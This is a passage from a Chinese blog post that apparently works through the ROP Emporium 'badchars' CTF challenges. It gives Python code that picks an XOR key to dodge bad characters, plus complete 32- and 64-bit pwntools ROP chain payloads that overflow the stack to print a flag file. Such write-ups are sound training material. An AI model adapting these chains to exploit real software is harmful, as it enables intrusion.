class="number">0xEB</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>那么就需要对payload进行加密处理</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_xor</span>(<span class="params">data, badchars=[], xor_num=<span class="number">0x1</span></span>):</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        found = <span class="literal">False</span></span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(data)):</span><br><span class="line">            c = <span class="built_in">chr</span>(<span class="built_in">ord</span>(data[i]) ^ xor_num)</span><br><span class="line">            <span class="keyword">if</span> c <span class="keyword">in</span> badchars:</span><br><span class="line">                xor_num += <span class="number">1</span></span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            <span class="keyword">if</span> i == <span class="built_in">len</span>(data) - <span class="number">1</span>:</span><br><span class="line">                found = <span class="literal">True</span></span><br><span class="line">        <span class="keyword">if</span> found:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> xor_num</span><br><span class="line"></span><br><span class="line">flag_file = <span class="string">&quot;flag.txt&quot;</span></span><br><span class="line">xor_num = get_xor(flag_file, <span class="built_in">list</span>(<span class="string">&quot;xga.&quot;</span>))</span><br><span class="line">log.info(<span class="string">&quot;xor number =&gt; %x&quot;</span> % xor_num)</span><br><span class="line">flag_file = <span class="string">&quot;&quot;</span>.join([<span class="built_in">chr</span>(<span class="built_in">ord</span>(c) ^ xor_num) <span class="keyword">for</span> c <span class="keyword">in</span> flag_file])</span><br><span class="line">log.info(<span class="string">&quot;xor flag_file =&gt; %s&quot;</span> % flag_file)</span><br></pre></td></tr></table></figure>
<p>可以找到异或数值为2</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[*] xor number =&gt; 2</span><br><span class="line">[*] xor flag_file =&gt; dnce,vzv</span><br><span class="line">[*] Stopped process <span class="string">&#x27;./badchars32&#x27;</span> (pid 66782</span><br></pre></td></tr></table></figure>
<p>直接就可以将上题的exp改造成此题的，ROP需要有xor操作</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 0x08048547 : xor byte ptr [ebp], bl ; ret</span></span><br><span class="line">xor_Mebp_bl = <span class="number">0x08048547</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x080485b8 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span></span><br><span class="line">pop_ebx_esi_edi_ebp = <span class="number">0x080485b8</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x0804854f : mov dword ptr [edi], esi ; ret</span></span><br><span class="line">mov_Medi_esi = <span class="number">0x0804854f</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x080485bb : pop ebp ; ret</span></span><br><span class="line">pop_ebp = <span class="number">0x080485bb</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;A&quot;</span> * <span class="number">44</span> + \</span><br><span class="line">        p32(pop_ebx_esi_edi_ebp) + p32(xor_num) + flag_file[:<span class="number">4</span>] + p32(data_addr) + p32(data_addr) + \</span><br><span class="line">        p32(mov_Medi_esi) + \</span><br><span class="line">        p32(pop_ebx_esi_edi_ebp) + p32(xor_num) + flag_file[<span class="number">4</span>:] + p32(data_addr + <span class="number">4</span>) + p32(data_addr + <span class="number">4</span>) + \</span><br><span class="line">        p32(mov_Medi_esi) + \</span><br><span class="line">        p32(pop_ebp) + p32(data_addr) + p32(xor_Mebp_bl) + \</span><br><span class="line">        p32(pop_ebp) + p32(data_addr + <span class="number">1</span>) + p32(xor_Mebp_bl) + \</span><br><span class="line">        p32(pop_ebp) + p32(data_addr + <span class="number">2</span>) + p32(xor_Mebp_bl) + \</span><br><span class="line">        p32(pop_ebp) + p32(data_addr + <span class="number">3</span>) + p32(xor_Mebp_bl) + \</span><br><span class="line">        p32(pop_ebp) + p32(data_addr + <span class="number">4</span>) + p32(xor_Mebp_bl) + \</span><br><span class="line">        p32(pop_ebp) + p32(data_addr + <span class="number">5</span>) + p32(xor_Mebp_bl) + \</span><br><span class="line">        p32(pop_ebp) + p32(data_addr + <span class="number">6</span>) + p32(xor_Mebp_bl) + \</span><br><span class="line">        p32(pop_ebp) + p32(data_addr + <span class="number">7</span>) + p32(xor_Mebp_bl) + \</span><br><span class="line">        p32(print_file) + \</span><br><span class="line">        <span class="string">&quot;BBBB&quot;</span> + p32(data_addr)</span><br></pre></td></tr></table></figure>
<p><img src="/2021/03/04/Linux-Pwn-%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%8EROP%EF%BC%88%E4%B8%80%EF%BC%89/badchars32.png"></p>
<h2 id="badchars"><a href="#badchars" class="headerlink" title="badchars"></a>badchars</h2><p>同x86版本，修改ROP为x64即可，另外对于<code>data_addr</code>地址的选择这次可能不能选<code>.data</code>的开头，在实际测试中<code>.data + 6</code>的位置异或上去没效果，具体原因没分析，改成<code>.data + 8</code>就行了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 0x00000000004006a3 : pop rdi ; ret</span></span><br><span class="line"><span class="comment"># 0x0000000000400628 : xor byte ptr [r15], r14b ; ret</span></span><br><span class="line">pop_rdi = <span class="number">0x00000000004006a3</span></span><br><span class="line">xor_Mr15_r14 = <span class="number">0x0000000000400628</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x0000000000400634 : mov qword ptr [r13], r12 ; ret</span></span><br><span class="line">mov_Mr13_r12 = <span class="number">0x0000000000400634</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x000000000040069c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret</span></span><br><span class="line">pop_r12_r13_r14_r15 = <span class="number">0x000000000040069c</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x00000000004006a2 : pop r15 ; ret</span></span><br><span class="line">pop_r15 = <span class="number">0x00000000004006a2</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;A&quot;</span> * <span class="number">40</span> + \</span><br><span class="line">        p64(pop_r12_r13_r14_r15) + flag_file + p64(data_addr) + p64(xor_num) + p64(data_addr) + \</span><br><span class="line">        p64(mov_Mr13_r12) + \</span><br><span class="line">        p64(xor_Mr15_r14) + \</span><br><span class="line">        p64(pop_r15) + p64(data_addr + <span class="number">1</span>) + p64(xor_Mr15_r14) + \</span><br><span class="line">        p64(pop_r15) + p64(data_addr + <span class="number">2</span>) + p64(xor_Mr15_r14) + \</span><br><span class="line">        p64(pop_r15) + p64(data_addr + <span class="number">3</span>) + p64(xor_Mr15_r14) + \</span><br><span class="line">        p64(pop_r15) + p64(data_addr + <span class="number">4</span>) + p64(xor_Mr15_r14) + \</span><br><span class="line">        p64(pop_r15) + p64(data_addr + <span class="number">5</span>) + p64(xor_Mr15_r14) + \</span><br><span class="line">        p64(pop_r15) + p64(data_addr + <span class="number">6</span>) + p64(xor_Mr15_r14) + \</span><br><span class="line">        p64(pop_r15) + p64(data_addr + <span class="number">7</span>) + p64(xor_Mr15_r14) + \</span><br><span class="line">        p64(pop_rdi) + \</span><br><span class="line">        p64(data_addr) + \</span><br><span class="line">        p64(print_file)</span><br></pre></td></tr></table></figure>
<p><img src="/2021/03/04/Linux-Pwn-%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%8EROP%EF%BC%88%E4%B8%80%EF%BC%89/badchars.png"></p>
 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          打赏
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>版权声明： </strong>
          
          本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://lzeroyuee.cn/2021/03/04/Linux-Pwn-%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%8EROP%EF%BC%88%E4%B8%80%EF%BC%89/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%AE%89%E5%85%A8/" rel="tag">二进制安全</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
    
      <a href="/2021/02/28/Linux-Pwn-pwntools-fmtstr%E6%A8%A1%E5%9D%97/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">Linux Pwn - pwntools fmtstr模块</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "sJHHqdejjKH1GtEKzxEL80y2-gzGzoHsz",
    app_key: "oPkDhBajzB1AvNe4r6CxTfU0",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
   
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2021
        <i class="ri-heart-fill heart_icon"></i> lzeroyuee
      </li>
    </ul>
    <ul>
      <li>
        
        
        
        由 <a href="https://hexo.io" target="_blank">Hexo</a> 强力驱动
        <span class="division">|</span>
        主题 - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/my.png" alt="lzeroyuee&#39;s blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/my.png">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/my.png">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->


<script src="/js/clickBoom2.js"></script>


<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>


<!-- CanvasBackground -->


<script src="/js/dz.js"></script>



    
  </div>
</body>

</html>